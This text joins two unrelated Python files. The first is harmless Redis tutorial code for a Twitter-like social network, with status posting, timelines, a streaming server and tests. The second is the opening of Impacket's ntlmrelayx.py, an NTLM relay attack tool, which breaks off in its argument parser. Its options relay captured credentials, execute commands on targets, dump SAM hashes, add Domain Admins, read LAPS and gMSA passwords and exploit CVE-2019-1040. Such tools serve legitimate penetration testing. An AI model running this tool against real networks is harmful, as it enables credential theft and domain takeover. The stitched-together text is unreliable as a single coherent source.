'id': id, #E
'uid': uid, #E
'login': login, #E
'following': 0, #E
'created': now, #E
})
pipeline.execute()
return id #F
# <end id="exercise-create-user-list"/>
#A Fetch the login name of the user who is creating the list
#B Generate a new list id
#C If the user doesn't exist, return
#D Add the new list to a ZSET of lists that the user has created
#E Create the list information HASH
#F Return the new list id
#END
# <start id="post-message"/>
def post_status(conn, uid, message, **data):
id = create_status(conn, uid, message, **data) #A
if not id: #B
return None #B
posted = conn.hget('status:%s'%id, 'posted') #C
if not posted: #D
return None #D
post = {str(id): float(posted)}
conn.zadd('profile:%s'%uid, **post) #E
syndicate_status(conn, uid, post) #F
return id
# <end id="post-message"/>
#A Create a status message using the earlier function
#B If the creation failed, return
#C Get the time that the message was posted
#D If the post wasn't found, return
#E Add the status message to the user's profile timeline
#F Actually push the status message out to the followers of the user
#END
# <start id="syndicate-message"/>
POSTS_PER_PASS = 1000 #A
def syndicate_status(conn, uid, post, start=0):
followers = conn.zrangebyscore('followers:%s'%uid, start, 'inf',#B
start=0, num=POSTS_PER_PASS, withscores=True) #B
pipeline = conn.pipeline(False)
for follower, start in followers: #E
pipeline.zadd('home:%s'%follower, **post) #C
pipeline.zremrangebyrank( #C
'home:%s'%follower, 0, -HOME_TIMELINE_SIZE-1)#C
pipeline.execute()
if len(followers) >= POSTS_PER_PASS: #D
execute_later(conn, 'default', 'syndicate_status', #D
[conn, uid, post, start]) #D
# <end id="syndicate-message"/>
#A Only send to 1000 users per pass
#B Fetch the next group of 1000 followers, starting at the last person to be updated last time
#E Iterating through the followers results will update the 'start' variable, which we can later pass on to subsequent syndicate_status() calls
#C Add the status to the home timelines of all of the fetched followers, and trim the home timelines so they don't get too big
#D If at least 1000 followers had received an update, execute the remaining updates in a task
#END
# <start id="syndicate-message-list"/>
def syndicate_status_list(conn, uid, post, start=0, on_lists=False):
key = 'followers:%s'%uid #A
base = 'home:%s' #A
if on_lists: #A
key = 'list:out:%s'%uid #A
base = 'list:statuses:%s' #A
followers = conn.zrangebyscore(key, start, 'inf', #B
start=0, num=POSTS_PER_PASS, withscores=True) #B
pipeline = conn.pipeline(False)
for follower, start in followers: #C
pipeline.zadd(base%follower, **post) #C
pipeline.zremrangebyrank( #C
base%follower, 0, -HOME_TIMELINE_SIZE-1) #C
pipeline.execute()
if len(followers) >= POSTS_PER_PASS: #D
execute_later(conn, 'default', 'syndicate_status', #D
[conn, uid, post, start, on_lists]) #D
elif not on_lists:
execute_later(conn, 'default', 'syndicate_status', #E
[conn, uid, post, 0, True]) #E
# <end id="syndicate-message-list"/>
#A Use keys for home timelines or list timelines, depending on how far along we are
#B Fetch the next group of 1000 followers or lists, starting at the last user or list to be updated last time
#C Add the status to the home timelines of all of the fetched followers, and trim the home timelines so they don't get too big
#D If at least 1000 followers had received an update, execute the remaining updates in a task
#E Start executing over lists if we haven't executed over lists yet, but we are done with home timelines
#END
# <start id="delete-message"/>
def delete_status(conn, uid, status_id):
key = 'status:%s'%status_id
lock = acquire_lock_with_timeout(conn, key, 1) #A
if not lock: #B
return None #B
if conn.hget(key, 'uid') != str(uid): #C
release_lock(conn, key, lock) #C
return None #C
pipeline = conn.pipeline(True)
pipeline.delete(key) #D
pipeline.zrem('profile:%s'%uid, status_id) #E
pipeline.zrem('home:%s'%uid, status_id) #F
pipeline.hincrby('user:%s'%uid, 'posts', -1) #G
pipeline.execute()
release_lock(conn, key, lock)
return True
# <end id="delete-message"/>
#A Acquire a lock around the status object to ensure that no one else is trying to delete it when we are
#B If we didn't get the lock, return
#C If the user doesn't match the user stored in the status message, return
#D Delete the status message
#E Remove the status message id from the user's profile timeline
#F Remove the status message id from the user's home timeline
#G Reduce the number of posted messages in the user information HASH
#END
# <start id="exercise-clean-out-timelines"/>
def clean_timelines(conn, uid, status_id, start=0, on_lists=False):
key = 'followers:%s'%uid #A
base = 'home:%s' #A
if on_lists: #A
key = 'list:out:%s'%uid #A
base = 'list:statuses:%s' #A
followers = conn.zrangebyscore(key, start, 'inf', #B
start=0, num=POSTS_PER_PASS, withscores=True) #B
pipeline = conn.pipeline(False)
for follower, start in followers: #C
pipeline.zrem(base%follower, status_id) #C
pipeline.execute()
if len(followers) >= POSTS_PER_PASS: #D
execute_later(conn, 'default', 'clean_timelines' , #D
[conn, uid, status_id, start, on_lists]) #D
elif not on_lists:
execute_later(conn, 'default', 'clean_timelines', #E
[conn, uid, status_id, 0, True]) #E
# <end id="exercise-clean-out-timelines"/>
#A Use keys for home timelines or list timelines, depending on how far along we are
#B Fetch the next group of 1000 followers or lists, starting at the last user or list to be updated last time
#C Remove the status from the home timelines of all of the fetched followers
#D If at least 1000 followers had received an update, execute the remaining updates in a task
#E Start executing over lists if we haven't executed over lists yet, but we are done with home timelines
#END
# <start id="streaming-http-server"/>
class StreamingAPIServer( #A
SocketServer.ThreadingMixIn, #B
BaseHTTPServer.HTTPServer): #B
daemon_threads = True #C
class StreamingAPIRequestHandler( #D
BaseHTTPServer.BaseHTTPRequestHandler): #E
def do_GET(self): #F
parse_identifier(self) #G
if self.path != '/statuses/sample.json': #H
return self.send_error(404) #H
process_filters(self) #I
def do_POST(self): #J
parse_identifier(self) #K
if self.path != '/statuses/filter.json': #L
return self.send_error(404) #L
process_filters(self) #M
# <end id="streaming-http-server"/>
#A Create a new class called 'StreamingAPIServer'
#B This new class should have the ability to create new threads with each request, and should be a HTTPServer
#C Tell the internals of the threading server to shut down all client request threads if the main server thread dies
#D Create a new class called 'StreamingAPIRequestHandler'
#E This new class should be able to handle HTTP requests
#F Create a method that is called do_GET(), which will be executed on GET requests performed against this server
#G Call a helper function that handles the fetching of an identifier for the client
#H If the request is not a 'sample' or 'firehose' streaming GET request, return a '404 not found' error
#I Otherwise, call a helper function that actually handles the filtering
#J Create a method that is called do_POST(), which will be executed on POST requests performed against this server
#K Call a helper function that handles the fetching of an identifier for the client
#L If the request is not a user, keyword, or location filter, return a '404 not found' error
#M Otherwise, call a helper function that actually handles the filtering
#END
# <start id="get-identifier"/>
def parse_identifier(handler):
handler.identifier = None #A
handler.query = {} #A
if '?' in handler.path: #B
handler.path, _, query = handler.path.partition('?') #C
handler.query = urlparse.parse_qs(query) #D
identifier = handler.query.get('identifier') or [None] #E
handler.identifier = identifier[0] #F
# <end id="get-identifier"/>
#A Set the identifier and query arguments to be palceholder values
#B If there were query arguments as part of the request, process them
#C Extract the query portion from the path, and update the path
#D Parse the query
#E Fetch the list of query arguments with the name 'identifier'
#F Use the first identifier passed
#END
# <start id="stream-to-client"/>
FILTERS = ('track', 'filter', 'location') #A
def process_filters(handler):
id = handler.identifier
if not id: #B
return handler.send_error(401, "identifier missing")#B
method = handler.path.rsplit('/')[-1].split('.')[0] #C
name = None
args = None
if method == 'filter': #D
data = cgi.FieldStorage( #E
fp=handler.rfile, #E
headers=handler.headers, #E
environ={'REQUEST_METHOD':'POST', #E
'CONTENT_TYPE':handler.headers['Content-Type'],#E
})
for name in data: #F
if name in FILTERS: #F
args = data.getfirst(name).lower().split(',') #F
break #F
if not args: #G
return handler.send_error(401, "no filter provided")#G
else:
args = handler.query #M
handler.send_response(200) #H
handler.send_header('Transfer-Encoding', 'chunked') #H
handler.end_headers()
quit = [False] #N
for item in filter_content(id, method, name, args, quit): #I
try:
handler.wfile.write('%X\r\n%s\r\n'%(len(item), item)) #J
except socket.error: #K
quit[0] = True #K
if not quit[0]:
handler.wfile.write('0\r\n\r\n') #L
# <end id="stream-to-client"/>
#A Keep a listing of filters that need arguments
#B Return an error if an identifier was not provided by the client
#C Fetch the method, should be one of 'sample' or 'filter'
#D If this is a filtering method, we need to fetch the arguments
#E Parse the POST request to discover the type and arguments to the filter
#F Fetch any of the filters provided by the client request
#G If there were no filters specified, return an error
#M For sample requests, pass the query arguments as the 'args'
#H Finally return a response to the client, informing them that they will be receiving a streaming response
#N Use a Python list as a holder for a pass-by-reference variable, which will allow us to tell the content filter to stop receiving messages
#I Iterate over the results of the filter
#J Send the pre-encoded response to the client using the chunked encoding
#K If sending to the client caused an error, then we need to tell the subscriber to unsubscribe and shut down
#L Send the "end of chunks" message to the client if we haven't already disconnected
#END
_create_status = create_status
# <start id="create-message-streaming"/>
def create_status(conn, uid, message, **data):
pipeline = conn.pipeline(True)
pipeline.hget('user:%s'%uid, 'login')
pipeline.incr('status:id:')
login, id = pipeline.execute()
if not login:
return None
data.update({
'message': message,
'posted': time.time(),
'id': id,
'uid': uid,
'login': login,
})
pipeline.hmset('status:%s'%id, data)
pipeline.hincrby('user:%s'%uid, 'posts')
pipeline.publish('streaming:status:', json.dumps(data)) #A
pipeline.execute()
return id
# <end id="create-message-streaming"/>
#A The added line to send a message to streaming filters
#END
_delete_status = delete_status
# <start id="delete-message-streaming"/>
def delete_status(conn, uid, status_id):
key = 'status:%s'%status_id
lock = acquire_lock_with_timeout(conn, key, 1)
if not lock:
return None
if conn.hget(key, 'uid') != str(uid):
release_lock(conn, key, lock)
return None
pipeline = conn.pipeline(True)
status = conn.hgetall(key) #A
status['deleted'] = True #B
pipeline.publish('streaming:status:', json.dumps(status)) #C
pipeline.delete(key)
pipeline.zrem('profile:%s'%uid, status_id)
pipeline.zrem('home:%s'%uid, status_id)
pipeline.hincrby('user:%s'%uid, 'posts', -1)
pipeline.execute()
release_lock(conn, key, lock)
return True
# <end id="delete-message-streaming"/>
#A Fetch the status message so that streaming filters can perform the same filters to determine whether the deletion should be passed to the client
#B Mark the status message as deleted
#C Publish the deleted status message to the stream
#END
# <start id="message-subscription"/>
@redis_connection('social-network') #A
def filter_content(conn, id, method, name, args, quit):
match = create_filters(id, method, name, args) #B
pubsub = conn.pubsub() #C
pubsub.subscribe(['streaming:status:']) #C
for item in pubsub.listen(): #D
message = item['data'] #E
decoded = json.loads(message) #E
if match(decoded): #F
if decoded.get('deleted'): #G
yield json.dumps({ #G
'id': decoded['id'], 'deleted': True}) #G
else:
yield message #H
if quit[0]: #I
break #I
pubsub.reset() #J
# <end id="message-subscription"/>
#A Use our automatic connection decorator from chapter 5
#B Create the filter that will determine whether a message should be sent to the client
#C Prepare the subscription
#D Receive messages from the subscription
#E Get the status message information from the subscription structure
#F Check if the status message matched the filter
#G For deleted messages, send a special 'deleted' placeholder for the message
#H For matched status messages that are not deleted, send the message itself
#I If the web server no longer has a connection to the client, stop filtering messages
#J Reset the Redis connection to ensure that the Redis server clears its outgoing buffers if this wasn't fast enough
#END
# <start id="create-filters"/>
def create_filters(id, method, name, args):
if method == 'sample': #A
return SampleFilter(id, args) #A
elif name == 'track': #B
return TrackFilter(args) #B
elif name == 'follow': #B
return FollowFilter(args) #B
elif name == 'location': #B
return LocationFilter(args) #B
raise Exception("Unknown filter") #C
# <end id="create-filters"/>
#A For the 'sample' method, we don't need to worry about names, just the arguments
#B For the 'filter' method, we actually worry about which of the filters we want to apply, so return the specific filters for them
#C If no filter matches, then raise an exception
#END
# <start id="sample-filter"/>
def SampleFilter(id, args): #A
percent = int(args.get('percent', ['10'])[0], 10) #B
ids = range(100) #C
shuffler = random.Random(id) #C
shuffler.shuffle(ids) #C
keep = set(ids[:max(percent, 1)]) #D
def check(status): #E
return (status['id'] % 100) in keep #F
return check
# <end id="sample-filter"/>
#A We are defining a filter class called "SampleFilter", which are created by passing 'id' and 'args' parameters
#B The 'args' parameter is actually a dictionary, based on the parameters passed as part of the GET request
#C We use the 'id' parameter to randomly choose a subset of ids, the count of which is determined by the 'percent' argument passed
#D We will use a Python set to allow us to quickly determine whether a status message matches our criteria
#E If we create a specially named method called '__call__' on an instance, it will be called if the instance is used like a function
#F To filter status messages, we fetch the status id, find its value modulo 100, and return whether it is in the status ids that we want to accept
#END
# <start id="track-filter"/>
def TrackFilter(list_of_strings):
groups = [] #A
for group in list_of_strings: #A
group = set(group.lower().split()) #A
if group:
groups.append(group) #B
def check(status):
message_words = set(status['message'].lower().split()) #C
for group in groups: #D
if len(group & message_words) == len(group): #E
return True #E
return False
return check
# <end id="track-filter"/>
#A The filter should have been provided with a list of word groups, and the filter matches if a message has all of the words in any of the groups
#B We will only keep groups that have at least 1 word
#C We are going to split words in the message on whitespace
#D Then we are going to iterate over all of the groups
#E If all of the words in any of the groups match, we will accept the message with this filter
#END
# <start id="follow-filter"/>
def FollowFilter(names):
nset = set() #A
for name in names: #B
nset.add('@' + name.lower().lstrip('@')) #B
def check(status):
message_words = set(status['message'].lower().split()) #C
message_words.add('@' + status['login'].lower()) #C
return message_words & nset #D
return check
# <end id="follow-filter"/>
#A We are going to try to match login names against posters and messages
#B Make all of the names consistently stored as '@username'
#C Construct a set of words from the message and the poster's name
#D Consider the message a match if any of the usernames provided match any of the whitespace-separated words in the message
#END
# <start id="location-filter"/>
def LocationFilter(list_of_boxes):
boxes = [] #A
for start in xrange(0, len(list_of_boxes)-3, 4): #A
boxes.append(map(float, list_of_boxes[start:start+4])) #A
def check(self, status):
location = status.get('location') #B
if not location: #C
return False #C
lat, lon = map(float, location.split(',')) #D
for box in self.boxes: #E
if (box[1] <= lat <= box[3] and #F
box[0] <= lon <= box[2]): #F
return True #F
return False
return check
# <end id="location-filter"/>
#A We are going to create a set of boxes that define the regions that should return messages
#B Try to fetch 'location' data from a status message
#C If the message has no location information, then it can't be inside the boxes
#D Otherwise, extract the latitude and longitude of the location
#E To match one of the boxes, we need to iterate over all boxes
#F If the message status location is within the required latitude and longitude range, then the status message matches the filter
#END
_filter_content = filter_content
def filter_content(identifier, method, name, args, quit):
print "got:", identifier, method, name, args
for i in xrange(10):
yield json.dumps({'id':i})
if quit[0]:
break
time.sleep(.1)
'''
# <start id="start-http-server"/>
if __name__ == '__main__': #A
server = StreamingAPIServer( #B
('localhost', 8080), StreamingAPIRequestHandler)#B
print 'Starting server, use <Ctrl-C> to stop' #C
server.serve_forever() #D
# <end id="start-http-server"/>
#A Run the below block of code if this module is being run from the command line
#B Create an insteance of the streaming API server listening on localhost port 8080, and use the StreamingAPIRequestHandler to process requests
#C Print an informational line
#D Run the server until someone kills it
#END
'''
class TestCh08(unittest.TestCase):
def setUp(self):
self.conn = redis.Redis(db=15)
self.conn.flushdb()
def tearDown(self):
self.conn.flushdb()
def test_create_user_and_status(self):
self.assertEquals(create_user(self.conn, 'TestUser', 'Test User'), 1)
self.assertEquals(create_user(self.conn, 'TestUser', 'Test User2'), None)
self.assertEquals(create_status(self.conn, 1, "This is a new status message"), 1)
self.assertEquals(self.conn.hget('user:1', 'posts'), '1')
def test_follow_unfollow_user(self):
self.assertEquals(create_user(self.conn, 'TestUser', 'Test User'), 1)
self.assertEquals(create_user(self.conn, 'TestUser2', 'Test User2'), 2)
self.assertTrue(follow_user(self.conn, 1, 2))
self.assertEquals(self.conn.zcard('followers:2'), 1)
self.assertEquals(self.conn.zcard('followers:1'), 0)
self.assertEquals(self.conn.zcard('following:1'), 1)
self.assertEquals(self.conn.zcard('following:2'), 0)
self.assertEquals(self.conn.hget('user:1', 'following'), '1')
self.assertEquals(self.conn.hget('user:2', 'following'), '0')
self.assertEquals(self.conn.hget('user:1', 'followers'), '0')
self.assertEquals(self.conn.hget('user:2', 'followers'), '1')
self.assertEquals(unfollow_user(self.conn, 2, 1), None)
self.assertEquals(unfollow_user(self.conn, 1, 2), True)
self.assertEquals(self.conn.zcard('followers:2'), 0)
self.assertEquals(self.conn.zcard('followers:1'), 0)
self.assertEquals(self.conn.zcard('following:1'), 0)
self.assertEquals(self.conn.zcard('following:2'), 0)
self.assertEquals(self.conn.hget('user:1', 'following'), '0')
self.assertEquals(self.conn.hget('user:2', 'following'), '0')
self.assertEquals(self.conn.hget('user:1', 'followers'), '0')
self.assertEquals(self.conn.hget('user:2', 'followers'), '0')
def test_syndicate_status(self):
self.assertEquals(create_user(self.conn, 'TestUser', 'Test User'), 1)
self.assertEquals(create_user(self.conn, 'TestUser2', 'Test User2'), 2)
self.assertTrue(follow_user(self.conn, 1, 2))
self.assertEquals(self.conn.zcard('followers:2'), 1)
self.assertEquals(self.conn.hget('user:1', 'following'), '1')
self.assertEquals(post_status(self.conn, 2, 'this is some message content'), 1)
self.assertEquals(len(get_status_messages(self.conn, 1)), 1)
for i in xrange(3, 11):
self.assertEquals(create_user(self.conn, 'TestUser%s'%i, 'Test User%s'%i), i)
follow_user(self.conn, i, 2)
global POSTS_PER_PASS
POSTS_PER_PASS = 5
self.assertEquals(post_status(self.conn, 2, 'this is some other message content'), 2)
time.sleep(.1)
self.assertEquals(len(get_status_messages(self.conn, 9)), 2)
self.assertTrue(unfollow_user(self.conn, 1, 2))
self.assertEquals(len(get_status_messages(self.conn, 1)), 0)
def test_refill_timeline(self):
self.assertEquals(create_user(self.conn, 'TestUser', 'Test User'), 1)
self.assertEquals(create_user(self.conn, 'TestUser2', 'Test User2'), 2)
self.assertEquals(create_user(self.conn, 'TestUser3', 'Test User3'), 3)
self.assertTrue(follow_user(self.conn, 1, 2))
self.assertTrue(follow_user(self.conn, 1, 3))
global HOME_TIMELINE_SIZE
HOME_TIMELINE_SIZE = 5
for i in xrange(10):
self.assertTrue(post_status(self.conn, 2, 'message'))
self.assertTrue(post_status(self.conn, 3, 'message'))
time.sleep(.05)
self.assertEquals(len(get_status_messages(self.conn, 1)), 5)
self.assertTrue(unfollow_user(self.conn, 1, 2))
self.assertTrue(len(get_status_messages(self.conn, 1)) < 5)
refill_timeline(self.conn, 'following:1', 'home:1')
messages = get_status_messages(self.conn, 1)
self.assertEquals(len(messages), 5)
for msg in messages:
self.assertEquals(msg['uid'], '3')
delete_status(self.conn, '3', messages[-1]['id'])
self.assertEquals(len(get_status_messages(self.conn, 1)), 4)
self.assertEquals(self.conn.zcard('home:1'), 5)
clean_timelines(self.conn, '3', messages[-1]['id'])
self.assertEquals(self.conn.zcard('home:1'), 4)
if __name__ == '__main__':
unittest.main()
|
ntlmrelayx.py
|
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2022 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# Generic NTLM Relay Module
#
# This module performs the SMB Relay attacks originally discovered
# by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc).
# It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first to try authenticate against the client connecting
# to us.
#
# It is implemented by invoking a SMB and HTTP Server, hooking to a few
# functions and then using the specific protocol clients (e.g. SMB, LDAP).
# It is supposed to be working on any LM Compatibility level. The only way
# to stop this attack is to enforce on the server SPN checks and or signing.
#
# If the authentication against the targets succeeds, the client authentication
# succeeds as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want to so the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
# Authors:
# Alberto Solino (@agsolino)
# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
import argparse
import sys
import logging
import cmd
try:
from urllib.request import ProxyHandler, build_opener, Request
except ImportError:
from urllib2 import ProxyHandler, build_opener, Request
import json
from threading import Thread
from impacket import version
from impacket.examples import logger
from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer, WCFRelayServer, RAWRelayServer
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS
RELAY_SERVERS = []
class MiniShell(cmd.Cmd):
def __init__(self, relayConfig, threads):
cmd.Cmd.__init__(self)
self.prompt = 'ntlmrelayx> '
self.tid = None
self.relayConfig = relayConfig
self.intro = 'Type help for list of commands'
self.relayThreads = threads
self.serversRunning = True
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print(outputFormat.format(*header))
print(' '.join(['-' * itemLen for itemLen in colLen]))
# And now the rows
for row in items:
print(outputFormat.format(*row))
def emptyline(self):
pass
def do_targets(self, line):
for url in self.relayConfig.target.originalTargets:
print(url.geturl())
return
def do_finished_attacks(self, line):
for url in self.relayConfig.target.finishedAttacks:
print (url.geturl())
return
def do_socks(self, line):
headers = ["Protocol", "Target", "Username", "AdminStatus", "Port"]
url = "http://localhost:9090/ntlmrelayx/api/v1.0/relays"
try:
proxy_handler = ProxyHandler({})
opener = build_opener(proxy_handler)
response = Request(url)
r = opener.open(response)
result = r.read()
items = json.loads(result)
except Exception as e:
logging.error("ERROR: %s" % str(e))
else:
if len(items) > 0:
self.printTable(items, header=headers)
else:
logging.info('No Relays Available!')
def do_startservers(self, line):
if not self.serversRunning:
start_servers(options, self.relayThreads)
self.serversRunning = True
logging.info('Relay servers started')
else:
logging.error('Relay servers are already running!')
def do_stopservers(self, line):
if self.serversRunning:
stop_servers(self.relayThreads)
self.serversRunning = False
logging.info('Relay servers stopped')
else:
logging.error('Relay servers are already stopped!')
def do_exit(self, line):
print("Shutting down, please wait!")
return True
def do_EOF(self, line):
return self.do_exit(line)
def start_servers(options, threads):
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(options.socks, socksServer)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.sid)
c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(options.smb2support)
c.setSMBChallenge(options.ntlmchallenge)
c.setInterfaceIp(options.interface_ip)
c.setExploitOptions(options.remove_mic, options.remove_target)
c.setWebDAVOptions(options.serve_image)
c.setIsADCSAttack(options.adcs)
c.setADCSOptions(options.template)
if server is HTTPRelayServer:
c.setListeningPort(options.http_port)
c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain)
elif server is SMBRelayServer:
c.setListeningPort(options.smb_port)
elif server is WCFRelayServer:
c.setListeningPort(options.wcf_port)
elif server is RAWRelayServer:
c.setListeningPort(options.raw_port)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
s = server(c)
s.start()
threads.add(s)
return c
def stop_servers(threads):
todelete = []
for thread in threads:
if isinstance(thread, tuple(RELAY_SERVERS)):
thread.server.shutdown()
todelete.append(thread)
# Now remove threads from the set
for thread in todelete:
threads.remove(thread)
del thread
# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)
#Parse arguments
parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will "
"try to relay that connection to specified target(s) system or the original client")
parser._optionals.title = "Main options"
#Main arguments
parser.add_argument("-h","--help", action="help", help='show this help message and exit')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-t',"--target", action='store', metavar = 'TARGET', help="Target to relay the credentials to, "
"can be an IP, hostname or URL like domain\\username@host:port (domain\\username and port "
"are optional, and don't forget to escape the '\\'). If unspecified, it will relay back "
"to the client')")
parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or '
'full URL, one per line')
parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list '
'automatically (only valid with -tf)')
parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient or LDAP console instead'
'of executing a command after a successful relay. This console will listen locally on a '
' tcp port and can be reached with for example netcat.')
# Interface address specification
parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
'bind SMB and HTTP servers',default='')
serversoptions = parser.add_argument_group()
serversoptions.add_argument('--no-smb-server', action='store_true', help='Disables the SMB server')
serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server')
serversoptions.add_argument('--no-wcf-server', action='store_true', help='Disables the WCF server')
serversoptions.add_argument('--no-raw-server', action='store_true', help='Disables the RAW server')
parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445)
parser.add_argument('--http-port', type=int, help='Port to listen on http server', default=80)
parser.add_argument('--wcf-port', type=int, help='Port to listen on wcf server', default=9389) # ADWS
parser.add_argument('--raw-port', type=int, help='Port to listen on raw server', default=6666)
parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection')
parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
'directory in which gathered loot such as SAM dumps will be stored (default: current directory).')
parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes '
'will be added for ntlm and ntlmv2')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute ntlmrelayx.py '
'again with -codec and the corresponding codec ' % sys.getdefaultencoding())
parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support')
parser.add_argument('-ntlmchallenge', action="store", default=None, help='Specifies the NTLM server challenge used by the '
'SMB Server (16 hex bytes long. eg: 1122334455667788)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, '
'setting the proxy host to the one supplied.')
parser.add_argument('-wa','--wpad-auth-num', action='store', type=int, default=1, help='Prompt for authentication N times for clients without MS16-077 installed '
'before serving a WPAD file. (default=1)')
parser.add_argument('-6','--ipv6', action='store_true',help='Listen on both IPv6 and IPv4')
parser.add_argument('--remove-mic', action='store_true',help='Remove MIC (exploit CVE-2019-1040)')
parser.add_argument('--serve-image', action='store',help='local path of the image that will we returned to clients')
parser.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
'target system (for SMB and RPC). If not specified for SMB, hashes will be dumped (secretsdump.py must be'
' in the same directory). For RPC no output will be provided.')
#SMB arguments
smboptions = parser.add_argument_group("SMB client options")
smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
#RPC arguments
rpcoptions = parser.add_argument_group("RPC client options")
rpcoptions.add_argument('-rpc-mode', choices=["TSCH"], default="TSCH", help='Protocol to attack, only TSCH supported')
rpcoptions.add_argument('-rpc-use-smb', action='store_true', required=False, help='Relay DCE/RPC to SMB pipes')
rpcoptions.add_argument('-auth-smb', action='store', required=False, default='', metavar='[domain/]username[:password]',
help='Use this credential to authenticate to SMB (low-privilege account)')
rpcoptions.add_argument('-hashes-smb', action='store', required=False, metavar="LMHASH:NTHASH")
rpcoptions.add_argument('-rpc-smb-port', type=int, choices=[139, 445], default=445, help='Destination port to connect to SMB')
#MSSQL arguments
mssqloptions = parser.add_argument_group("MSSQL client options")
mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute'
'(can specify multiple)')
#HTTPS options
httpoptions = parser.add_argument_group("HTTP options")
httpoptions.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
httpoptions.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
httpoptions.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
httpoptions.add_argument('-remove-target', action='store_true', default=False,
help='Try to remove the target in the challenge message (in case CVE-2019-1019 patch is not installed)')
#LDAP options
ldapoptions = parser.add_argument_group("LDAP client options")
ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')
ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')
ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks')
ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks')
ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one')
ldapoptions.add_argument('--add-computer', action='store', metavar='COMPUTERNAME', required=False, const='Rand', nargs='?', help='Attempt to add a new computer account')
ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')
ldapoptions.add_argument('--sid', action='store_true', required=False, help='Use a SID to delegate access rather than an account name')
ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user')
ldapoptions.add_argument('--dump-gmsa', action='store_true', required=False, help='Attempt to dump any gMSA passwords readable by the user')
#IMAP options
imapoptions = parser.add_argument_group("IMAP client options")
